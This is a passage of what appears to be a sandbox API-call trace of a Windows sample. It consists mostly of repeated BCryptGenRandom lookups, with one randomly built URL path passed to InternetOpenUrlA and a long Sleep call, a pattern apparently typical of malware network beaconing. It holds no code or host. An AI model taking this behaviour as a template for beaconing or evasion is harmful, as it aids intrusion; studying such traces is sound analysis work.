lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.389] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.389] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.389] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0173.389] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.389] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.389] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.389] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.389] GetProcessHeap () returned 0x440000 [0173.389] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0173.389] lstrcpyA (in: lpString1=0x473770, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0173.390] lstrcatA (in: lpString1="\x04", lpString2="/m90aoL44Kbe1Yhxb4YOUoCqXx4ym/" | out: lpString1="\x04/m90aoL44Kbe1Yhxb4YOUoCqXx4ym/") returned="\x04/m90aoL44Kbe1Yhxb4YOUoCqXx4ym/" [0173.390] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0173.390] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/m90aoL44Kbe1Yhxb4YOUoCqXx4ym/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0173.390] GetProcessHeap () returned 0x440000 [0173.390] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0173.390] GetProcessHeap () returned 0x440000 [0173.390] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5770 | out: hHeap=0x440000) returned 1 [0173.390] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0173.390] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0173.390] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0173.391] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0173.391] Sleep (dwMilliseconds=0x15581) [0173.505] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.505] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0173.505] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.505] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0173.505] GetProcessHeap () returned 0x440000 [0173.505] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a01a50 [0173.505] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.505] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0173.506] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01a51, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x3a01a51) returned 0x0 [0173.506] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.506] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.506] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.506] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.507] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0173.507] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.507] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.507] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.507] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.507] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.508] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0173.509] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01a6c, cbBuffer=0x1e, dwFlags=0x2 | out: pbBuffer=0x3a01a6c) returned 0x0 [0173.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.510] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.511] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.511] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.512] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.512] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.513] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.514] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.514] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.514] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.514] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.514] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.515] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.515] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.515] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.515] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.515] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.517] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0173.517] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01a8a, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x3a01a8a) returned 0x0 [0173.517] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.517] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.517] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.517] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0173.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0173.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01aa3, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a01aa3) returned 0x0 [0173.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.637] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.637] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.638] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.638] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.638] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.638] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.638] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.638] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0173.639] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0173.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: 